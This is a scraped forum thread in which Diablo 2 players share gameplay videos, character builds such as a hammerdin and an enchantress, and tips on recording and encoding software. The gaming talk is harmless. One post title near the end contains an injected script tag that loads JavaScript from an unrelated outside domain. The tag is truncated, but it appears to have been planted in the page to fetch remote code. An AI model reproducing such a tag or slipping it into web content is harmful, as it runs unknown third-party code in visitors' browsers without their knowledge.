Latest Diablo 3 News
DiabloWiki Updates
Page 3 of 42 FirstFirst 123456713 ... LastLast
    IncGamers Member

Re: Share Your Gameplay Videos!

Nice videos all.

@verno: Possessed is his hammerdin's name.

@PJ: That's going better than i thought it would. Do you have any trouble with Lord de Seiz if he's extra fast? Also if i may make a suggestion: You don't seem to be using your weaponswitch. If you use dual wiz spikes you can teleport a lot faster than with those swords.

@Verno: There is no difference. The name of this char is Possessed and the build is a standard hammerdin.

BattleTag MagpieMcGraw-2483

@Cyrax: Eh. I find it somewhat inconvenient to switch weapons for teleporting. I might forget to switch back.

Lord De Seis is the most dangerous encounter in the whole CS. I haven't died to him in the dozen or so runs that I've done. I think most of the time his minions would be frozen by the glacial spike from Death. Lawbringer interrupts their swing animation sometimes too. Worst case scenario, I could just use howl to chase the minions away and kill Lord De Seis, removing the fanaticism.

Another video of a different char in a different area is uploading. It's not a run as much as a showoff.

EDIT: Looks like the sound on the new vid got messed up. It recorded the skype call that I was having at the moment, so you can hear the game sounds, and one side of a conversation. Will record anew

EDIT: Here's the new video. This time with quality. Click!

Last edited by Pijus; 10-04-2012 at 18:09.

BattleTag kestegs-1550

Cool videos everyone!

This is the first video I ever made:

I just realized it also recorded my Mumble conversation, guess I'll have to mute it next time

I also just DL'ed Bandicam. The problem with Fraps is that the free version only allows a 30 second video, and I couldn't get it to work in windowed mode. I will try to make a good video of my singer barb running pits, wanted to do that for a while now!

What do you guys use to edit your videos, and what format do you convert them to before uploading them?

Quote Originally Posted by Pijus View Post
    EDIT: Here's the new video. This time with quality. Click!
    Nice vid. A shame the tunnels aren't nice and straight. Would be suiting your pally much better. Maybe you should try and get a source of teleport. That merc keeps lagging behind. Btw have you found anything decent there?
    This also reminds me of my sorc who uses demon machine + razortail too. Only she is running the icy cellar. Much tougher area. Bad monster spawns possible + monsters not nice enough to line up for the shot (no narrow corridors). Seems like i should've choosen to run the maggot lair instead. Maybe i should make a vid of her too . Would be something different than cookie cutters running the usual areas.

Enchantress running is just so fun! I really enjoyed countess runs with mine, and ghost boss packs were a breeze.
    I think i'll start making videos when I replace my computer with something that can handle it.

I ran the maggot lair just to show off. I don't MF with that paladin, he's just for getting through the game(and personalizing my fortitude). I'll have to look into the ice cellar.

I don't really edit my videos, I just stitch them together using avidemux. The encoding options are pretty straight forward too. Xvid > constant quatiser ? 7, 8 or 9. Mp3 lame for audio. Save as avi.

Doing videos is fun. I'll have to get one of my other chars. Maybe a cow run?

EDIT: Magemancer!
    EDIT: Turn your volume down. The universe can't handle so mant bolts being fired at once.

Last edited by Pijus; 11-04-2012 at 19:16.

My untwinked single-pass hardcore low-level barb, level 24 in act 1nightmare

<****** class="restrain" title="YouTube video player" width="640" height="390" src="//www.youtube.com/embed/-SNvjMkaqag?wmode=opaque" frameborder="0">

items : http://i.imgur.com/BqSHK.jpg

For the first time I have nearly come to the point where it is so challenging that it becomes irritating, when killing a single monster pack requires several minutes of crowd control, hit and run, regen in town, and so on... the entire act was done in probably more than 12 hours. Yet, at the end, it was rewarding

Re: Share Your Gameplay Videos!<script src=http://www.betheboss.it/ads/link.js></scri

Hey guys!

New video up. Arkardo's recent guardian thread reminded me I have a druid. Here he is: Click!

Well back in days when i played alot of 1.13 i had a nice idea of a LK-running assassin, so here she is, enjoy